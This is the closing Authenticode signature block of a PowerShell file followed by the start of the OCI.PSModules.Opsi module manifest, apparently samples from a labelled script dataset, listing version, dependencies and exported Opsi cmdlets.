# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiMwghofAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA
# BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIAds
# XCkKMReSMdnLnz4zFgSH6Xh7weNTAwVBhOoRXsgOMEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAeSEuBOaIeus7iX8tkXVA49A/yixwbMgy3ASI
# ghwed52tYKTPniZBRlGEMmYzQvyqoSJApiJkvXuVz+L8Kq3zGa7NwiWOGzmgjz0b
# JYgmXmgENv3stI7FWhKFBO/CjPVGylbHZJVJb/hH9ANN3Vb7TsO71P2wXVkRdAaf
# wZ3fv6uB4ksrpNIne5r5LtCIbpBna6RL4zN3MPS+HFQ9i3PgM1KkdyQjXzY1mTRu
# G29TgzI/+2u9Apuh/vfEantvRAyuu3KZhx21lb4pnKbFG+LEQqNaiVjNNxibal1p
# Y/4lEyNPyjYbhsMV3Dqo88VST1CeZlz3Hk7LpkPxVw91OctDrKGCF60wghepBgor
# BgEEAYI3AwMBMYIXmTCCF5UGCSqGSIb3DQEHAqCCF4YwgheCAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCDTrSGYZXBhbsknL+mD1DnwB3eEmJEZVyVN
# RhI+M1gJ0wIGZusiCs6bGBMyMDI0MTAyODExNDA0MC44NDRaMASAAgH0oIHZpIHW
# MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL
# EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT
# Hm5TaGllbGQgVFNTIEVTTjozNjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z
# b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEfswggcoMIIFEKADAgECAhMzAAAB91gg
# dQTK+8L0AAEAAAH3MA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzEwNloXDTI1MTAyMjE4MzEwNlowgdMxCzAJ
# BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k
# MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv
# c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs
# ZCBUU1MgRVNOOjM2MDUtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt
# ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA
# 0OdHTBNom6/uXKaEKP9rPITkT6QxF11tjzB0Nk1byDpPrFTHha3hxwSdTcr8Y0a3
# k6EQlwqy6ROz42e0R5eDW+dCoQapipDIFUOYp3oNuqwX/xepATEkY17MyXFx6rQW
# 2NcWUJW3Qo2AuJ0HOtblSpItQZPGmHnGqkt/DB45Fwxk6VoSvxNcQKhKETkuzrt8
# U6DRccQm1FdhmPKgDzgcfDPM5o+GnzbiMu6y069A4EHmLMmkecSkVvBmcZ8VnzFH
# TDkGLdpnDV5FXjVObAgbSM0cnqYSGfRp7VGHBRqyoscvR4bcQ+CV9pDjbJ6S5rZn
# 1uA8hRhj09Hs33HRevt4oWAVYGItgEsG+BrCYbpgWMDEIVnAgPZEiPAaI8wBGemE
# 4feEkuz7TAwgkRBcUzLgQ4uvPqRD1A+Jkt26+pDqWYSn0MA8j0zacQk9q/AvciPX
# D9It2ez+mqEzgFRRsJGLtcf9HksvK8Jsd6I5zFShlqi5bpzf1Y4NOiNOh5QwW1pI
# vA5irlal7qFhkAeeeZqmop8+uNxZXxFCQG3R3s5pXW89FiCh9rmXrVqOCwgcXFIJ
# QAQkllKsI+UJqGq9rmRABJz5lHKTFYmFwcM52KWWjNx3z6odwz2h+sxaxewToe9G
# qtDx3/aU+yqNRcB8w0tSXUf+ylN4uk5xHEpLpx+ZNNsCAwEAAaOCAUkwggFFMB0G
# A1UdDgQWBBTfRqQzP3m9PZWuLf1p8/meFfkmmDAfBgNVHSMEGDAWgBSfpxVdAF5i
# XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv
# c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB
# JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw
# Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp
# bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud
# JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF
# AAOCAgEAN0ajafILeL6SQIMIMAXM1Qd6xaoci2mOrpR8vKWyyTsL3b83A7XGLiAb
# QxTrqnXvVWWeNst5YQD8saO+UTgOLJdTdfUADhLXoK+RlwjfndimIJT9MH9tUYXL
# zJXKhZM09ouPwNsrn8YOLIpdAi5TPyN8Cl11OGZSlP9r8JnvomW00AoJ4Pl9rlg0
# G5lcQknAXqHa9nQdWp1ZxXqNd+0JsKmlR8tcANX33ClM9NnaClJExLQHiKeHUUWt
# qyLMl65TW6wRM7XlF7Y+PTnC8duNWn4uLng+ON/Z39GO6qBj7IEZxoq4o3avEh9b
# a43UU6TgzVZaBm8VaA0wSwUe/pqpTOYFWN62XL3gl/JC2pzfIPxP66XfRLIxafjB
# VXm8KVDn2cML9IvRK02s941Y5+RR4gSAOhLiQQ6A03VNRup+spMa0k+XTPAi+2aM
# H5xa1Zjb/K8u9f9M05U0/bUMJXJDP++ysWpJbVRDiHG7szaca+r3HiUPjQJyQl2N
# iOcYTGV/DcLrLCBK2zG503FGb04N5Kf10XgAwFaXlod5B9eKh95PnXKx2LNBgLwG
# 85anlhhGxxBQ5mFsJGkBn0PZPtAzZyfr96qxzpp2pH9DJJcjKCDrMmZziXazpa5V
# VN36CO1kDU4ABkSYTXOM8RmJXuQm7mUF3bWmj+hjAJb4pz6hT5UwggdxMIIFWaAD
# AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD
# VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe
# MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv
# ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy
# MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo
# aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y
# cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw
# MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5
# vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64
# NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu
# je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl
# 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg
# yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I
# 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2
# ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/
# TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy
# 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y
# 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H
# XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB
# AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW
# BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B
# ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz
# L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB
# BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB
# Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL
# oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv
# TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr
# BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS
# b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq
# reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27
# DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv
# vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak
# vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK
# NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2
# kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+
# c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep
# 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk
# txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg
# DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/
# 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDVjCCAj4CAQEwggEBoYHZpIHW
# MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL
# EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT
# Hm5TaGllbGQgVFNTIEVTTjozNjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z
# b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAb28KDG/xXbNB
# jmM7/nqw3bgrEOaggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MDANBgkqhkiG9w0BAQsFAAIFAOrJsSYwIhgPMjAyNDEwMjgwNjQzNTBaGA8yMDI0
# MTAyOTA2NDM1MFowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6smxJgIBADAHAgEA
# AgIPIDAHAgEAAgIT5zAKAgUA6ssCpgIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgor
# BgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUA
# A4IBAQBaN24RfbEDYuiZzqm7A4pV5f2hpp1MXvQiKNCPCo6auhWTBxhWvoAFA2Yd
# uik5ad6IJA7n3eXZZvkfovjXUeUfclz34hSqlUveVGitbm3K9Awqnk2tZGgk9Li0
# GfRa6QSb/KpHS+RGIAeRp0zHfzfqy/SmE6GTQFacpa8KRg7boj/ktDUBq0kkQ578
# OFTecSrudpM+HrP9rwuxbsGhVUoCOEsKOp0WdtzSXBlryAdgyGP1izHSW9Tc92oI
# /x2UnsP+/eCeuyNqOYe6VBjwFFzrSlLoVp2/o4gAiafzJbJpD2LXbW7P8MOkaTRN
# ky50Lo7MnEMgN3LQB6Hb4jUX9rCAMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTACEzMAAAH3WCB1BMr7wvQAAQAAAfcwDQYJYIZIAWUD
# BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B
# CQQxIgQgVyt16uf3vh8Za1ghxe2l6Yt4fFgOglT8ov3ZpMhXcfAwgfoGCyqGSIb3
# DQEJEAIvMYHqMIHnMIHkMIG9BCAh2pjaa3ca0ecYuhu60uYHP/IKnPbedbVQJ5So
# IH5Z4jCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u
# MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp
# b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB
# 91ggdQTK+8L0AAEAAAH3MCIEIGH07306AH18MQdXDVR9dHZ+mbda9Lv03oh+XI/b
# gvEVMA0GCSqGSIb3DQEBCwUABIICAJQk2RlniLQwnt+3JYQA/vN7NHAPXfv3aEkE
# ozgSCYPoPHv/qmseiaAhhzHgp/NcG2zrlilJjfpGdXqU6fR6dCSw11lhjOFfRG7q
# 5gXZ/k4jKYeu2Q0Fm7WWKopgn4f/Gtp49HRgwexnOVdE+g8d2pTf6O2FbxtuIN74
# tpfBpZz0z1L4FwOwnL/2+iBMJX54k74+IyNkck1XmIc0POPcITJfhwG81PneaLgV
# 9zwa9Fr2LYljbwKp+Q9hlapWE+RNgKxozKilB0ASRxaDoBDfbWPOd+zEeLqTYJ6h
# Qge6r1V7EkqspgP9OCLpEAYfZYV6b233ra9BWaMZTGsaClNjFfO4UnJkhg5hA2WT
# WunPTe1GldzBeXuaeEyhJpNlSO+baw4UANo0L7wgs1POWJMCwgGH6PIm2cupguAk
# 8X8HVar0SwweKFpQZD+JUqUJymEQ4nblCuIvr7x9YXuk8HUiIh9Zcp5fRQCAhPZy
# rj8T8iwaFpyV6N1CgIZ3TC9oaMvk5AGbhlk8iNXVnnu21JpXx0rBVwkNKMd79Q7a
# P5GYUbPxlRL3Evnmp8QKhF2fieuAW6/GV+mtWfpJMCfWR8Ql1LfOesac1wYgvFXs
# deLLv5+hFgnvQ3HyP3L86aBEkjEz1ZOafZ7tASCAHe01L/azUmScK9GCzUEvyXYv
# LAE6Wpkj
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_59_67.ps1
|
sample_59_67.ps1
|
#
# Module manifest for module 'OCI.PSModules.Opsi'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Opsi.dll'
# Version number of this module.
ModuleVersion = '83.3.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '467f5e25-fff2-4ca2-ac74-48ebfddab98f'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Opsi Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.3.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Opsi.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Add-OCIOpsiExadataInsightMembers',
'Disable-OCIOpsiAutonomousDatabaseInsightAdvancedFeatures',
'Disable-OCIOpsiAwrHubSource', 'Disable-OCIOpsiDatabaseInsight',
'Disable-OCIOpsiExadataInsight', 'Disable-OCIOpsiHostInsight',
'Enable-OCIOpsiAutonomousDatabaseInsightAdvancedFeatures',
'Enable-OCIOpsiAwrHubSource', 'Enable-OCIOpsiDatabaseInsight',
'Enable-OCIOpsiExadataInsight', 'Enable-OCIOpsiHostInsight',
'Get-OCIOpsiAddmDbFindingCategoriesList',
'Get-OCIOpsiAddmDbFindingsTimeSeriesList',
'Get-OCIOpsiAddmDbParameterCategoriesList',
'Get-OCIOpsiAddmDbRecommendationCategoriesList',
'Get-OCIOpsiAddmDbRecommendationsTimeSeriesList',
'Get-OCIOpsiAddmDbsList', 'Get-OCIOpsiAwrDatabaseReport',
'Get-OCIOpsiAwrDatabasesList',
'Get-OCIOpsiAwrDatabaseSnapshotsList',
'Get-OCIOpsiAwrDatabaseSqlReport', 'Get-OCIOpsiAwrHub',
'Get-OCIOpsiAwrHubObject', 'Get-OCIOpsiAwrHubObjectsList',
'Get-OCIOpsiAwrHubsList', 'Get-OCIOpsiAwrHubSource',
'Get-OCIOpsiAwrHubSourcesList', 'Get-OCIOpsiAwrReport',
'Get-OCIOpsiAwrSnapshotsList', 'Get-OCIOpsiConfiguration',
'Get-OCIOpsiConfigurationsList',
'Get-OCIOpsiDatabaseConfigurationsList',
'Get-OCIOpsiDatabaseInsight', 'Get-OCIOpsiDatabaseInsightsList',
'Get-OCIOpsiDataObject', 'Get-OCIOpsiDataObjectsList',
'Get-OCIOpsiEnterpriseManagerBridge',
'Get-OCIOpsiEnterpriseManagerBridgesList',
'Get-OCIOpsiExadataConfigurationsList', 'Get-OCIOpsiExadataInsight',
'Get-OCIOpsiExadataInsightsList',
'Get-OCIOpsiHostConfigurationsList',
'Get-OCIOpsiHostedEntitiesList', 'Get-OCIOpsiHostInsight',
'Get-OCIOpsiHostInsightsList',
'Get-OCIOpsiImportableAgentEntitiesList',
'Get-OCIOpsiImportableComputeEntitiesList',
'Get-OCIOpsiImportableEnterpriseManagerEntitiesList',
'Get-OCIOpsiNewsReport', 'Get-OCIOpsiNewsReportsList',
'Get-OCIOpsiOperationsInsightsPrivateEndpoint',
'Get-OCIOpsiOperationsInsightsPrivateEndpointsList',
'Get-OCIOpsiOperationsInsightsWarehouse',
'Get-OCIOpsiOperationsInsightsWarehousesList',
'Get-OCIOpsiOperationsInsightsWarehouseUser',
'Get-OCIOpsiOperationsInsightsWarehouseUsersList',
'Get-OCIOpsiSqlPlansList', 'Get-OCIOpsiSqlSearchesList',
'Get-OCIOpsiSqlTextsList', 'Get-OCIOpsiWarehouseDataObjectsList',
'Get-OCIOpsiWorkRequest', 'Get-OCIOpsiWorkRequestErrorsList',
'Get-OCIOpsiWorkRequestLogsList', 'Get-OCIOpsiWorkRequestsList',
'Invoke-OCIOpsiDownloadOperationsInsightsWarehouseWallet',
'Invoke-OCIOpsiHeadAwrHubObject', 'Invoke-OCIOpsiIngestAddmReports',
'Invoke-OCIOpsiIngestDatabaseConfiguration',
'Invoke-OCIOpsiIngestHostConfiguration',
'Invoke-OCIOpsiIngestHostMetrics', 'Invoke-OCIOpsiIngestSqlBucket',
'Invoke-OCIOpsiIngestSqlPlanLines', 'Invoke-OCIOpsiIngestSqlStats',
'Invoke-OCIOpsiIngestSqlText',
'Invoke-OCIOpsiQueryOpsiDataObjectData',
'Invoke-OCIOpsiQueryWarehouseDataObjectData',
'Invoke-OCIOpsiRotateOperationsInsightsWarehouseWallet',
'Invoke-OCIOpsiSummarizeAddmDbFindings',
'Invoke-OCIOpsiSummarizeAddmDbParameterChanges',
'Invoke-OCIOpsiSummarizeAddmDbParameters',
'Invoke-OCIOpsiSummarizeAddmDbRecommendations',
'Invoke-OCIOpsiSummarizeAddmDbSchemaObjects',
'Invoke-OCIOpsiSummarizeAddmDbSqlStatements',
'Invoke-OCIOpsiSummarizeAwrDatabaseCpuUsages',
'Invoke-OCIOpsiSummarizeAwrDatabaseMetrics',
'Invoke-OCIOpsiSummarizeAwrDatabaseParameterChanges',
'Invoke-OCIOpsiSummarizeAwrDatabaseParameters',
'Invoke-OCIOpsiSummarizeAwrDatabaseSnapshotRanges',
'Invoke-OCIOpsiSummarizeAwrDatabaseSysstats',
'Invoke-OCIOpsiSummarizeAwrDatabaseTopWaitEvents',
'Invoke-OCIOpsiSummarizeAwrDatabaseWaitEventBuckets',
'Invoke-OCIOpsiSummarizeAwrDatabaseWaitEvents',
'Invoke-OCIOpsiSummarizeAwrSourcesSummaries',
'Invoke-OCIOpsiSummarizeConfigurationItems',
'Invoke-OCIOpsiSummarizeDatabaseInsightResourceCapacityTrend',
'Invoke-OCIOpsiSummarizeDatabaseInsightResourceForecastTrend',
'Invoke-OCIOpsiSummarizeDatabaseInsightResourceStatistics',
'Invoke-OCIOpsiSummarizeDatabaseInsightResourceUsage',
'Invoke-OCIOpsiSummarizeDatabaseInsightResourceUsageTrend',
